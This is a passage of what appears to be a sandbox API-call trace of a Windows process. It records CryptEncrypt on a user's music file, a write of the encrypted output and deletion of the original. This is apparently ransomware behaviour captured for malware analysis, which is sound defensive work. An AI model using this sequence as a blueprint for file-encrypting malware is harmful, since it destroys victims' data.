hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0110.971] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2710, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2710*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0110.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0110.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0110.973] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0110.973] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.973] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0110.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0110.974] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.974] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.974] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.974] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca598, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0110.976] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x10c18, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x10c20) returned 1 [0110.976] CharLowerBuffW (in: lpsz="byte[68641]", cchLength=0xb | out: lpsz="byte[68641]") returned 0xb [0110.978] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.978] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0110.978] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e790*=0x10c18, dwBufLen=0x10c20 | out: pbData=0x499a008*, pdwDataLen=0x144e790*=0x10c20) returned 1 [0110.978] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.112] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x10c20, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0x10c20, lpOverlapped=0x0) returned 1 [0111.114] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0111.114] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.114] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca358, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0111.114] CryptDestroyKey (hKey=0x41ac600) returned 1 [0111.114] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.115] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.115] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.115] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.115] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0111.115] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0111.115] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.115] FreeLibrary (hLibModule=0x756e0000) returned 1 [0111.115] CloseHandle (hObject=0x258) returned 1 [0111.115] CloseHandle (hObject=0x298) returned 1 [0111.117] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\MZTSENpJHOvP.mp3", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\MZTSENpJHOvP.mp3", lpFilePart=0x0) returned 0x26 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0111.118] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\MZTSENpJHOvP.mp3" (normalized: "c:\\users\\fd1hvy\\music\\mztsenpjhovp.mp3")) returned 0x20 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d18 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0111.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0111.118] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\MZTSENpJHOvP.mp3", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6af1030, ftCreationTime.dwHighDateTime=0x1d5e5e7, ftLastAccessTime.dwLowDateTime=0xe23eca30, ftLastAccessTime.dwHighDateTime=0x1d5e55e, ftLastWriteTime.dwLowDateTime=0xe23eca30, ftLastWriteTime.dwHighDateTime=0x1d5e55e, nFileSizeHigh=0x0, nFileSizeLow=0x10c18, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="MZTSENpJHOvP.mp3", cAlternateFileName="MZTSEN~1.MP3")) returned 0x41ac640 [0111.118] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MZTSENpJHOvP.mp3" (normalized: "c:\\users\\fd1hvy\\music\\mztsenpjhovp.mp3")) returned 1 [0111.185] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6af1030, ftCreationTime.dwHighDateTime=0x1d5e5e7, ftLastAccessTime.dwLowDateTime=0xe23eca30, ftLastAccessTime.dwHighDateTime=0x1d5e55e, ftLastWriteTime.dwLowDateTime=0xe23eca30, ftLastWriteTime.dwHighDateTime=0x1d5e55e, nFileSizeHigh=0x0, nFileSizeLow=0x10c18, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="MZTSENpJHOvP.mp3", cAlternateFileName="MZTSEN~1.MP3")) returned 0 [0111.185] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0111.185] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0111.185] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0111.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7b00 | out: hHeap=0x1780000) returned 1 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9a10 | out: hHeap=0x1780000) returned 1 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0111.186] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0111.186] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0111.186] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0111.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2290 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0111.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 